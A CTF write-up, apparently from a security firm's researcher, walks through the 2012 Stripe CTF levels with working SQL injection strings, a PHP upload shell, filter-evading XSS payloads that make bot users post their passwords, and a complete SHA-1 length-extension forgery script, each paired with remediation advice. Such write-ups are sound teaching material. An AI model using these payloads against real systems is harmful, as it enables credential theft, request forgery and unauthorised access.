Several of us from WhiteHat’s Threat Research Center (TRC) in Houston recently participated in our first “Capture the Flag” (CTF). This particular one-week event, the Stripe CTF, running from noon August 22 to noon August 29, was designed with Web Application security in mind and was an excellent playground to exploit several vulnerabilities that we encounter almost every day here in the TRC.


Capture the Flag is a hacking competition in which teams of hackers attempt to attack and/or defend computers and networks using certain software and custom-built scripts. This particular CTF pitted attackers against each other in a race to complete the game’s challenges before the deadline, with the quickest solve-times worthy of praise. The objective of the Stripe game was to penetrate the proposed scenario − often mimicking real-life networking / online environments − and bring back the flag (a random string of characters), which is then submitted for a point. Scoring a point enables you to advance to the next challenge. Each challenge can be visualized as a virtual scenario of “getting past enemy lines, obtaining the flag, and bringing it back home so you can be briefed on the next mission.”

There are few situations, outside of legal penetration testing, where an aspiring whitehat can test his or her merit. This is one of them.

The challenges at the start are fairly elementary, but they quickly ascend in difficulty. The greatest difficulty, however, lies in hosting the challenge itself. I’d like to congratulate Stripe for running an extremely successful − and reliable − CTF. With thousands of hackers poking and prodding at the same servers, there’s bound to be both downtime and some failures on those servers. Fortunately, the only annoyances my colleagues and I experienced were trivial amounts of latency, at most. The developers running a CTF must also be aware of any bugs that can occur, and be able to lock down the underlying issue swiftly.

My Results

Stripe admins report that over 16,000 accounts were created to attempt this CTF. My final solve time for the last flag netted me 228th place, based on a total solve time of 78.45 hours, from Wednesday, August 22, 2012, to Saturday, August 25. Given that this was my first CTF experience, I’m extremely happy with myself: after all, I did manage to get some sleep, and also had to save the internet from the evil clutches of malicious users.

When I reached the last challenge, only 18 people had captured the final flag. However, because my scripting-language skills still needed strengthening, 210 people passed me before I figured out the last solution − with the assistance of fellow Ethical Hackers Zach Jones, Armando Sosa, and Raymond LeBlanc.


Below I will include the challenge information that Stripe presented, each solution, and a discussion of the vulnerabilities that were present.

Source Code

For your reference, I’ve uploaded all of the code for the respective levels here.

Let the games begin!

Level 0: The (not so) Secret Safe

Vulnerability: SQL Injection

The starting point − Level 00 – is the Secret Safe. The Secret Safe is a secure place for storing all of your secrets, and also stores the password you need to access Level 1. If only you knew how to crack safes…

The Web server here is built on node.js, the server-side JavaScript platform. If you analyze line 45 of level00.html, you’ll see that a POST request will be parsed and inserted into the database. A GET request, as described on line 30, will print the key/value pair for the key you supplied. However, line 34 exposes the flaw: the query uses LIKE. Because of that, you can supply the ‘%’ wildcard, which matches every string in the table and therefore prints all results. All you need to do here is input a ‘%’.
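The flaw can be re-created in a few lines. The challenge itself ran on node.js, and the schema and data below are made up, but the LIKE behavior is the same:

```python
# Illustrative re-creation of the Level 0 flaw: a lookup built on LIKE lets
# SQL wildcards in user input match every row. Schema and data are made up.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
db.execute("INSERT INTO secrets VALUES ('level01-password', 'not-the-real-flag')")
db.execute("INSERT INTO secrets VALUES ('another-key', 'another-secret')")

def lookup(key):
    # Parameterized, yet still broken: LIKE interprets '%' in the value itself
    return db.execute(
        "SELECT key, secret FROM secrets WHERE key LIKE ?", (key,)
    ).fetchall()

print(len(lookup("another-key")))  # 1: the intended single-key behavior
print(len(lookup("%")))            # 2: '%' matches everything in the table
```

Note that parameterization alone does not help here; the fix is to use an equality comparison (or escape LIKE metacharacters) when exact-match lookup is intended.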

Level 1: The Guessing Game

Vulnerability: Insufficient Input Validation

Excellent, you are now on Level 1, the Guessing Game. All you have to do here is guess the correct combination and you’ll receive the password to access Level 2! This level contains no security vulnerabilities − and the machine running the Guessing Game has no outbound network connectivity − so you probably wouldn’t be able to extract the password.  Or will you…?

In this Level 1 challenge, the developer makes a fatal mistake by giving untrusted input a chance to make its way into the application. On line 13 of index.php, extract is called on unvalidated − and unlimited − input. It takes all of the parameter/value pairs in the URL and makes them variables in the current scope, overwriting any pre-existing assignments along the way.

$filename is declared to be ‘secret-combination.txt’ on line 12 before the extract is called, so you need to overwrite this. When you supply a guess to the “secret combination” in this level, attempt=guessgoeshere will appear in the URL. By simply making a request with ?filename=&attempt= at the end of the query string you’ll obtain the flag. Because the value assigned to both parameters will be empty strings, they will satisfy the conditional on line 16.
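PHP’s extract() behavior can be modeled in a few lines of Python to show why the bypass works. This is an illustrative model of the level’s logic, not its actual code:

```python
# Model of the Level 1 check. extract() is simulated by dumping every request
# parameter into the scope, clobbering the pre-set filename variable.

def guessing_game(params):
    scope = {"filename": "secret-combination.txt"}  # set before extract()
    scope.update(params)          # extract(): attacker wins any name clash
    filename = scope["filename"]
    attempt = scope.get("attempt", "")
    # Reading an empty filename yields an empty "combination" in this model,
    # so comparing it to an empty attempt trivially succeeds.
    combination = "" if filename == "" else "<contents of the secret file>"
    return attempt == combination

print(guessing_game({"attempt": "12345"}))             # False: a real guess
print(guessing_game({"filename": "", "attempt": ""}))  # True: check bypassed
```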

Level 2: The Social Network

Vulnerabilities: Local File Inclusion, Abuse of Functionality

Excellent work so far! You are now on Level 2, the Social Network. Social Networks are all the rage these days, so we decided to build one for CTF. Fill out your profile; by doing so, you may even be able to discover your password for Level 3.

In this scenario, you are able to access an application that asks you to upload a profile picture to The Social Network, and are told that only “members of the club” can access password.txt. But if you try to navigate to password.txt directly, you’ll be denied access and receive the message: “Forbidden: You don’t have permission to access /~user-colhjxvfwo/password.txt on this server”.

However, the upload functionality does not validate that only image file types can be uploaded as a “profile picture”, and the uploaded file gets stored in the uploads directory. All you need to do is create a file called x.php with the following contents:

<?php echo file_get_contents("../password.txt");

Now you can navigate directly to /uploads/x.php and view your newly, and easily, acquired flag for submission. This Level 2 Challenge illustrates that, as a developer, you always want to validate your input. If you are only expecting images (jpg, png, gif, etc.), be sure to employ several test cases that properly validate that these files are the only files possible to upload. Also, be mindful that just because an extension ends in .jpg doesn’t mean it’s an actual .jpg file.
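A sketch of the missing validation, assuming the handler can read the uploaded bytes. The magic-byte table below covers only a few common image formats, and the function names are illustrative:

```python
# Sketch of server-side upload validation: check both the extension and the
# file's leading magic bytes, so "x.php" (or a PHP file renamed to end in
# .jpg) is rejected before it is ever written to the uploads directory.
import os

IMAGE_SIGNATURES = {
    ".jpg": b"\xff\xd8\xff",        # JPEG
    ".png": b"\x89PNG\r\n\x1a\n",   # PNG
    ".gif": b"GIF8",                # GIF87a / GIF89a
}

def is_valid_image(filename, content):
    ext = os.path.splitext(filename)[1].lower()
    magic = IMAGE_SIGNATURES.get(ext)
    return magic is not None and content.startswith(magic)

print(is_valid_image("x.php", b"<?php echo 'pwned';"))        # False
print(is_valid_image("shell.jpg", b"<?php echo 'pwned';"))    # False
print(is_valid_image("cat.jpg", b"\xff\xd8\xff\xe0..."))      # True
```

Serving the uploads directory with script execution disabled would be a sensible second layer, so even a file that slips through cannot run as PHP.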

Looking Ahead: File upload abuse can cause a world of problems. It’s so severe that you’ll be using it to exploit the Level 8 Challenge.

Level 3: The (still not so) Secret Safe v2.0

Vulnerability: SQL Injection

After the fiasco in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution − kind of like Unbreakable Linux. The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.

A beta version has launched with some interesting secrets − including the password to access Level 4.

“Bob” has your flag in Level 3, and the flag is his password. As a simple blind SQL test, you can attempt to log in with username='&password='. The resulting page will be an error page complaining that you’ve provided invalid syntax. This is music to any penetration tester’s delicate ears. Inspect lines 86-87 and you’ll encounter a query that is not using prepared statements.

query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username)

Lines 95-97 reveal another interesting detail: the supplied password is first salted (realuserpassword+randomcharacters), then hashed with SHA256. The hex digest of that hash is compared to the user’s password hash previously stored in the database.

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
    return "That's not the password for {0}!\n".format(username)

You want the password for bob, so all you need to do is give the query what it expects. You supply an id, a SHA256 hash of any string of your choosing, and a salt (which can be an empty string) via a UNION clause that selects bob’s row, then comment out the rest of the SQL syntax.

We can retrieve bob’s password by supplying the following POST request:

username=' UNION SELECT id, '37268335dd6931045bdcdf92623ff819a64244b53d0e746d438797349d4da578', 'test' FROM users where username='bob' --&password=test

Hello, pretty Flag No. 3. If only the developer had used parameterized queries, or at least escaped the input, this vulnerability could have been prevented. The following page then returns this message:

Welcome back! Your secret is: “The password to access level04 is: TzukOHMEmW”
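The mechanics of the bypass can be re-created with sqlite3 and hashlib. The vulnerable query is string-formatted exactly as in the challenge; bob’s stored hash and salt are placeholders, since the attack never touches them:

```python
# Re-creation of the Level 3 UNION bypass against an in-memory database.
# bob's real hash/salt are placeholders: the UNION row replaces them with
# attacker-chosen values, so the login check compares against our own hash.
import hashlib
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT, salt TEXT)")
db.execute("INSERT INTO users VALUES (1, 'bob', 'bobs-real-hash', 'bobs-real-salt')")

password = "test"  # attacker-chosen password, submitted alongside the payload
attacker_hash = hashlib.sha256((password + "test").encode()).hexdigest()

username = ("' UNION SELECT id, '{0}', 'test' FROM users "
            "WHERE username='bob' --").format(attacker_hash)

# The vulnerable string-formatted query from the challenge
query = ("SELECT id, password_hash, salt FROM users "
         "WHERE username = '{0}' LIMIT 1").format(username)
row = db.execute(query).fetchone()

# The check from lines 95-97 now passes with the attacker's own values
calculated = hashlib.sha256((password + row[2]).encode()).hexdigest()
print(calculated == row[1])  # True: authenticated as bob
```

The first SELECT matches nothing, the UNION row supplies the forged (id, hash, salt) triple, and `--` comments out the trailing quote and LIMIT clause.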

Level 4: The Karma Trader

Vulnerability: Cross-Site Scripting

The Karma Trader is the world’s best way to reward people for good deeds. You can sign up for an account, and start transferring karma to people who you think are doing good for the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The very active user karma_fountain has infinite karma, making it a ripe account to obtain. After all, no one will notice a few extra karma trades here and there. The password for karma_fountain‘s account will give you access to Level 5.

In this application, the currency Karma is gifted to other users. To ensure that it is traded legally, Alice shows Bob her password when Alice gives Bob any Karma. With this methodology, only “good” people will be gifted Karma. There is a JavaScript-driven bot named karma_fountain that periodically logs in, but does nothing other than log in. At the bottom of the karma_fountain page, all users in the system are listed, along with a timestamp of when they were last active. karma_fountain’s password is your flag, and it’s immediately apparent that you want karma_fountain to give you Karma, which will expose the Level 5 flag to you. However, karma_fountain simply logs on, and then logs off.

Because karma_fountain has its own session, you can deliver an injection to it by setting your own password to the payload, then giving karma_fountain some Karma. Upon logging in and checking its Karma, your password/injection will be rendered on the karma_fountain page, forcing a request from karma_fountain to a user of your choosing. In the following injection (modified for readability), karma_fountain is forced to send a POST request that gives 5 Karma to the user “winner”:

var xhr = new XMLHttpRequest();"POST", '', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

After supplying the injection, you only need to wait for karma_fountain to log in. Several minutes of page-refreshing later, karma_fountain logs in and its password is displayed to us:

karma_fountain (password: yQNQNLM1gG , last active 03:40:04 UTC)

Thus, Cross-Site Scripting is made possible by a combination of two failures: improper input validation and the absence of output encoding. In the above situation, the input not being validated is the password field. Proper XSS remediation techniques can be found in the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

Level 5: The Stripe CTF Domain Authenticator

Vulnerability: Insufficient Authentication

Many attempts have been made at creating a federated identity system for the Web (see OpenID, for example). However, none of them have been successful. Until today.

The DomainAuthenticator is based on a novel protocol for establishing identities. To authenticate to a site, you simply provide its username, password, and pingback URL. The site then posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.

You can check out the Stripe CTF DomainAuthenticator instance here. You can use it to distribute the password to access Level 6. Now, if only you could somehow authenticate yourself as a user of a level05 machine…

To avoid nefarious exploits, network access for the machine hosting the DomainAuthenticator is very locked down: it can make only outbound requests to servers. However, say you’ve heard that someone forgot to internally firewall the high ports from the Level 02 server…

Given that knowledge, you now need to provide a username and password, as well as a pingback URL whose response contains AUTHENTICATED, as indicated by lines 107-109. The regex also specifies that AUTHENTICATED must be preceded by a non-word character and followed by nothing but non-word characters through the end of the body.

body =~ /[^\w]AUTHENTICATED[^\w]*$/

However, the pingback URL will be accepted only if it is hosted on a host:

ALLOWED_HOSTS = /\.stripe-ctf\.com$/

Hmmm…. So, you need to reference a file, and it can only come from a host. The convenient and vulnerable level02 server, with its Abuse of Functionality file upload, comes to mind, except that it does not match PASSWORD_HOSTS on line 55. Because it’s not recognized, the script will not show you the password if you just blatantly reference the file that contains the “ AUTHENTICATED ” output.

PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/

Or can you? The code might be a bit misleading, but technically, if you upload a file containing the contents ” AUTHENTICATED ” to the level02 server, and place the URL to that file as a value to the pingback parameter, the following steps will occur:

  1. Application sends a pingback to the level05 server asking if you’re authenticated.
  2. The level05 server then chains this pingback to the level02 server, gets its response, and supplies that response as input coming back to the level05 server’s Web application.
  3. Because the level02 server responded with “ AUTHENTICATED ”, the level05 server responds with the authenticated output.

Again, in this situation, no user input was validated. The developers did not anticipate that a user might recursively chain URLs. Therefore, wherever a user can supply input, the application must have checks in place that validate that the input is trusted and expected. Only then should the input be accepted.

Level 6: The Streamer

Vulnerability: Cross-Site Scripting

After Karma Trader, from Level 04, was hit with massive karma inflation − purportedly due to someone flooding the market with massive quantities of karma − the site closed its doors. All hope was not lost, however, because the technology was acquired by a real up-and-comer, Streamer. Streamer proclaims itself the most streamlined way of sharing updates with your friends. You can access your Streamer instance here.

Streamer’s engineers, realizing that security holes led to the demise of Karma Trader, greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 07, level07-password-holder, is the first Streamer user.

Furthermore, the level07-password-holder is taking a lot of precautions: His or her computer has no network access other than the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and similar complexities.

This level seemed to stump a lot of people, but it wasn’t that difficult for me; in fact, the challenge was a lot of fun. The main hurdle was learning a bit of jQuery. The trick here, very similar to the Level 4 challenge, is to force the level07-password-holder to unwillingly post the password. Below is a screenshot of the post functionality that you get to exploit in this application.

When you click on your name, a request is made to /user_info that shows your username and password:

Also, when attempting to make a post to the Streamer, the following POST body is sent:


Several people seemed to get stuck at this point because they saw a CSRF token. A CSRF token is a very effective defense against forging a request and tricking another user into submitting it. However, if a Cross-Site Scripting vulnerability is present, CSRF protection is easily circumvented. Testing a post with a simple <script>alert(1)</script> injection breaks the Streamer: the functionality disappears, and only bits and pieces of broken code appear.

Let’s examine this error in greater detail, because it’s fundamental in getting the injection you’ll need to work.

All right, something went wrong. Let’s take a look at the DOM environment and see what happened:

<script>var username = "testing";
var post_data = [{"time":"Tue Aug 28 05:14:19 +0000 2012","title":"testing","user":"testing",
"id":null,"body":"testing"},{"time":"Tue Aug 28 05:14:20 +0000 2012","title":"testing",
"user":"testing","id":null,"body":"testing"},{"time":"Tue Aug 28 05:14:20 +0000 2012",
{"time":"Tue Aug 28 05:23:45 +0000 2012","title":"testing","user":"testing","id":null,
"body":"testing"},{"time":"Tue Aug 28 05:23:45 +0000 2012","title":"testing","user":"testing",
function escapeHTML(val) {return $('<div>').text(val).html();}function addPost(item)
{var new_element = '' + escapeHTML(item['user']) +'<h4>' + escapeHTML(item['title']) + '</h4>'
+escapeHTML(item['body']) + '';$('#posts > tbody:last').prepend(new_element);}
for(var i = 0; i < post_data.length; i++) {var item = post_data[i];addPost(item);};

It appears the Streamer’s functionality was broken by prematurely ending the script tag, causing all of the text past the </script> tag to be displayed. This can be easily remedied by starting the injection with a closing script tag, opening a new one, inserting the payload, closing it off again, and then opening one last script tag. Your injection will now live in the inner script tags, while the outer script tags repair the damage you’ve done to Streamer’s posting functionality.

</script><script> Malicious payload will go here </script><script>

It’s also worth noting that upon testing an injection with </script><script>alert('XSS')</script><script>, the injection didn’t fire, because there is a bit of filtering going on with the input. It appears the application rejects any input that contains (') or (").

So you need to do two additional things to get this injection to work. First, you’ll need to make a request to the page /user_info to retrieve the password. Secondly, you’ll need to get the level07-password-holder to post the /user_info response. You can accomplish all this by using the following injection, separated with a statement on each line for readability:

$.get('/user_info', function(data){
$.post('/user-irnpeljyje/posts',{
title:'x',body: data,_csrf:document.getElementsByName('_csrf')[0].value});
});

Awesome! You now have an injection that will work. However, there remains one pretty big underlying problem to overcome. Remember the rejection of input containing (') and (")? Those characters are in the injection, and the level07-password-holder also has them in his or her password. Not only will this prevent the above injection from being accepted, but even stripping (') and (") from the /user_info response would be counter-productive, as you would then not receive the full password.

“As well, level07-password-holder is taking a lot of precautions: His or her computer has no network access other than the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.”

The way you can overcome these precautions is to use some simple filter-evasion techniques. With JavaScript, there’s a seemingly infinite number of ways to do this, limited only by an attacker’s own ingenuity. One nifty trick that you can employ for this little quote fiasco is to replace title:'x' and document.getElementsByName('_csrf') with title:/x/.source and document.getElementsByName(/_csrf/.source). However, you can’t do the same thing for '/user_info' and '/user-irnpeljyje/posts', because of the leading / character; attempting //user_info/.source or //user-irnpeljyje/posts/.source would cause an error. The way to bypass that problem is to convert each character to its character code, and place those codes in a String.fromCharCode() call.
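Decoding those String.fromCharCode() arguments (the same code points used in the final injection) confirms what the two obfuscated strings spell:

```python
# Decode the character codes from the injection back into the two strings.
get_codes = [117, 115, 101, 114, 95, 105, 110, 102, 111]
post_codes = [47, 117, 115, 101, 114, 45, 105, 114, 110, 112, 101, 108,
              106, 121, 106, 101, 47, 112, 111, 115, 116, 115]

print("".join(map(chr, get_codes)))   # user_info
print("".join(map(chr, post_codes)))  # /user-irnpeljyje/posts
```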

Now you have one last obstacle to overcome: the level07-password-holder has (') and (") in the password. The technique for accessing this password is to take the full HTML response from your GET request to /user_info and store it in the variable data. To prevent your forced post from being rejected, you can use the escape() function to encode every character in that source. Your final injection will then be the following:

$.get(String.fromCharCode(117, 115, 101, 114, 95, 105, 110, 102, 111), function(data){
$.post(String.fromCharCode(47, 117, 115, 101, 114, 45, 105, 114, 110, 112, 101, 108, 106, 121, 106, 101, 47, 112, 111, 115, 116, 115),{
title:/x/.source,body: escape(data),_csrf:document.getElementsByName(/_csrf/.source)[0].value});
});

One last interesting note is that the Streamer shows only the five most recent posts. This injection will cause everyone requesting the page to inadvertently post their password, including you! The level07-password-holder account behaves exactly like the karma_fountain account from Level 4, in the sense that it will sporadically log on and off. The exception here is that level07-password-holder likes to taunt you with posts like, “Are you feeling hungry for a sandwich?” or “I have a new good book for you to read.”

Well, you can show him who’s in charge. After posting the injection, logging off, waiting about 5 minutes (sandwich sounds really good right about now, thanks level07-password-holder), and then logging back in, you get to see that your friend has posted his or her own password. Oops? =)

Now that you have the response of the password page for the level07-password-holder, all that’s left to do is decode the post and extract the part that you want – take a close look at lines 3 and 4 from the bottom of the above image. You’ve Conquered Level 6, so just two more Challenges to go!


Level 7: Waffle Thievery

Vulnerability: Insufficient Authorization along with weak cryptography implementation

Welcome to the penultimate level, Level 7.

WaffleCopter is a new service that delivers locally sourced organic waffles hot off vintage waffle irons, straight to your location, using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food-delivery industry. WaffleCopter is currently being tested as a private beta in select locations.

Your goal is to order one of the decadent Liège Waffles, which is offered only to WaffleCopter’s first premium subscribers.

Log in to your account at with username ctf and password password. You will find your API credentials after logging in.

This is by far the most intriguing challenge of the CTF. While the straightforward goal is to order the magnificent Liege Waffle, it’s soon very clear that you are not as special as other people in this world, and that you lack the premium status required to order a Liege Waffle. Thankfully, hackers don’t need premium status to order premium “things.”

Upon logging in, the following information is presented:

Your API credentials

  • endpoint:
  • user_id: 5
  • secret: 9tjDFCx5FNgqjD

Available waffles

  • liege (premium)
  • dream (premium)
  • veritaffle
  • chicken (premium)
  • belgian
  • brussels
  • eggo

And that’s all. There’s a link to API Request Logs at /logs/5, but it doesn’t show anything. However, your user_id is also 5, so what are the odds that you can force browse to /logs/1, and then see user_id:1’s API Request Logs? Yes. Bingo!

API Request Logs

[Screenshot: two signed POST requests to /orders from user 1, each logged 2012-08-22 10:32:08]
If you try to repeat this POST request to /orders but change waffle=liege, you get the message “that waffle requires a premium subscription.” And if you instead provide user_id=1 (we know he’s a premium user, because he’s ordered a chicken waffle), you receive the message “signature check failed.”

What this tells you is that some sort of authentication is validating the source of the order. Every user has a secret key that is used to sign a request and create a signature. The server then verifies this signature, and either accepts or rejects the request based on the validity of the signature.

Here’s the definition that shows what’s going on in the signature-verification process:

def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

Let’s analyze this definition.

First, the cryptographic function being performed is SHA-1. In this code, the user’s secret is pulled from the database, the digest SHA1(secret + raw_params) is computed, and that digest is then compared against the signature sent in the same request. If the two are identical, the request is accepted; otherwise, it’s rejected. SHA-1 has known weaknesses, and although this scheme provides a decent layer of protection, the bare SHA1(secret + message) construction is exploitable.
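The client’s side of this scheme is easy to reconstruct. As a sketch (the |sig: separator matches the signed request shown later in this level; the exact parameter layout is an assumption):

```python
import hashlib

def sign_request(secret, raw_params):
    # The signature is just SHA1(secret + raw_params), appended to the body.
    sig = hashlib.sha1(secret + raw_params).hexdigest()
    return raw_params + b"|sig:" + sig.encode()

body = sign_request(b"9tjDFCx5FNgqjD", b"count=1&user_id=5&waffle=eggo")
```

Note that the secret never travels over the wire; only the signature derived from it does.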

So… What’s there to exploit? Well, the way SHA-1 itself processes input, once you understand how it works.

The Hash Length Extension Attack

One iteration within the SHA-1 compression function:
A, B, C, D and E are 32-bit words of the state;
F is a nonlinear function that varies;
<<<n denotes a left bit rotation by n places, where n varies for each operation;
Wt is the expanded message word of round t;
Kt is the round constant of round t;
⊞ denotes addition modulo 2^32.

Hash algorithms such as SHA-1 (Secure Hash Algorithm) are finite state machines that operate on fixed-size blocks of input, folding each block in turn into the current internal state. The implementation applies a compression function to the current internal state and the current block, which produces the next internal state. What this tells you is that everything the algorithm knows about the input so far is, at any moment in time, contained entirely in the current internal state − and the final hash is simply that state after the last block.
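You can see this streaming behavior with Python’s hashlib: feeding the input in pieces produces the same digest as feeding it all at once, because each update just advances the internal state (the secret and body strings here are placeholders):

```python
import hashlib

one_shot = hashlib.sha1(b"secret" + b"count=1&waffle=eggo").hexdigest()

h = hashlib.sha1()
h.update(b"secret")               # state now encodes the secret...
h.update(b"count=1&waffle=eggo")  # ...and then the message
assert h.hexdigest() == one_shot
```

This is exactly the property the attack abuses: if you know a digest, you know the internal state after that input.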

In order to exploit this situation, you’ll need to implement your own variation of the SHA-1 algorithm that extends the hash. This can be done by loading the internal state from a known digest and then processing additional blocks of input. If you remember the /orders POST requests from the logs above, you’ll see they have given us valid signatures. You also know that the length of the secret key is 14 bytes, and with this information, you can generate the proper amount of padding.

For SHA-1, when the input is not an exact multiple of the 64-byte block size, the input gets padded in the background until it is. Because that padding was included in the original computation, the signature you ultimately forge has the form SHA1(secret + message + paddingOf(secret + message) + extension), where the paddingOf(secret + message) that you supply is exactly the padding added in the original computation. Of course, for you to generate that padding, you must know the length of the secret (which you do know).
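The padding is fully determined by the input length alone, which is why knowing the 14-byte secret length is enough. A sketch of the rule (0x80, then zeros up to 8 bytes short of a 64-byte boundary, then the bit length as a big-endian 64-bit integer); the 57-byte request body length matches the logged request used later:

```python
import struct

def sha1_padding(message_len):
    """SHA-1 padding for a message of message_len bytes."""
    pad = b"\x80"
    pad += b"\x00" * ((56 - (message_len + 1) % 64) % 64)
    pad += struct.pack(">Q", message_len * 8)
    return pad

# secret (14 bytes) + 57-byte request body must land on a 64-byte boundary:
glue = sha1_padding(14 + 57)
assert (14 + 57 + len(glue)) % 64 == 0
```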

If you suppose that SHA1(secret + plaintext) is used as a hash signature − that is, the secret acts as the key − and you know the length of the secret, you can create the SHA-1 hash signature of (plaintext + paddingOf(secret + plaintext) + whateverWeWantHere) without ever knowing the secret key. You already know a valid plaintext request, and if you assume that all users on the system have the same key length that you were given when first visiting the application, you can generate the padding required. This was done with the “” script located here.
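That script isn’t reproduced in this post, but the whole attack can be sketched in pure Python. The SHA-1 implementation below is my own minimal version with two extra hooks − seeding the five state words from a known digest, and lying about the total length used in the final padding − which is all a length extension needs. The secret is the one issued to user 5 above, standing in for the victim’s unknown key; the attacker’s half of the code only ever uses its length:

```python
import hashlib
import struct

def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def sha1(data, state=(0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0),
         fake_len=None):
    """Minimal SHA-1. `state` seeds the internal state words; `fake_len`
    overrides the byte length written into the final padding."""
    total = len(data) if fake_len is None else fake_len
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack(">Q", total * 8)
    h = list(state)
    for off in range(0, len(msg), 64):
        w = list(struct.unpack(">16I", msg[off:off + 64]))
        for t in range(16, 80):
            w.append(_rol(w[t - 3] ^ w[t - 8] ^ w[t - 14] ^ w[t - 16], 1))
        a, b, c, d, e = h
        for t in range(80):
            if t < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif t < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif t < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            a, b, c, d, e = (_rol(a, 5) + f + e + k + w[t]) & 0xFFFFFFFF, a, _rol(b, 30), c, d
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d, e))]
    return "".join("%08x" % x for x in h)

# --- the attack ---
secret = b"9tjDFCx5FNgqjD"   # server-side only; the attacker knows just its length
orig   = b"count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken"
ext    = b"&waffle=liege"

orig_sig = hashlib.sha1(secret + orig).hexdigest()   # leaked via the request logs

# Attacker: rebuild the glue padding from the known lengths alone.
n = len(secret) + len(orig)
glue = b"\x80" + b"\x00" * ((56 - (n + 1) % 64) % 64) + struct.pack(">Q", n * 8)

# Seed SHA-1 with the leaked digest and hash only the extension.
seed = struct.unpack(">5I", bytes.fromhex(orig_sig))
forged_sig = sha1(ext, state=seed, fake_len=n + len(glue) + len(ext))

# The server, which does know the secret, accepts the forged body:
assert hashlib.sha1(secret + orig + glue + ext).hexdigest() == forged_sig
```

Notice that the attacker’s code never touches secret: it reconstructs the glue padding from lengths alone and seeds SHA-1 with the leaked digest.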

What you want to do here is take a request that you are able to make with your account, and then append the padding and new message. This will give you something similar to the following:

count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd

The \x00’s are escaped representations of null bytes − that is, the specific byte value 0x00. Some of the information gets lost when those bytes are printed, so you’ll need to submit the request with a Python script; if you tried to send the request as POST data through a browser, you’d be sending literal “\x00” strings instead of actual null bytes.
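For example, sending the body as raw bytes keeps the nulls intact. The URL below is a placeholder (the real WaffleCopter /orders endpoint isn’t reproduced here), and the byte layout mirrors the forged payload above:

```python
import urllib.request

# Placeholder URL -- substitute the real WaffleCopter /orders endpoint.
raw_body = (b"count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken"
            + b"\x80" + b"\x00" * 54 + b"\x028"
            + b"&waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd")

req = urllib.request.Request(
    "https://example.com/orders",
    data=raw_body,  # bytes pass through unmodified, null bytes included
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)
# urllib.request.urlopen(req)  # would transmit the raw bytes verbatim
```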

After completing this challenge, I learned that some intercepting proxies can send decoded null bytes, but I did not know that at the time of tackling this problem.

Upon acceptance of the signature from your hash-extended request, you’ll be given the flag that provides access to the final challenge.

In this challenge, the developer should have used a hash-based message authentication code (HMAC) instead of a straightforward SHA-1 implementation. Without the information leakage of a valid signature, or the insufficient authorization (force browsing to /logs/1 − which is obviously not your account, and which is what let you see a valid signature in the first place), it would have been much more difficult to order the liege waffle.

Level 8: Cracking the Code

Vulnerabilities: Information Leakage, Brute Force

Welcome to the final level, Level 8.

HINT 1: No, really, you’re not looking for a timing attack.

HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?

UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag will NOT change.

Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accessible at

PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["", …]} to PasswordDB, which will respond with {"success": true} or {"success": false} to you and your specified webhook endpoints.

(For example, try running curl -d '{"password": "password-to-check", "webhooks": []}'.)
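The same probe in Python (the host is a placeholder; the real PasswordDB endpoint isn’t shown in this post):

```python
import json
import urllib.request

# Placeholder host -- substitute the actual PasswordDB primary server.
payload = json.dumps({"password": "000000000000", "webhooks": []}).encode()
req = urllib.request.Request(
    "http://example.com/",
    data=payload,
    headers={"Content-Type": "application/json"},
)
# urllib.request.urlopen(req).read() would return b'{"success": false}\n'
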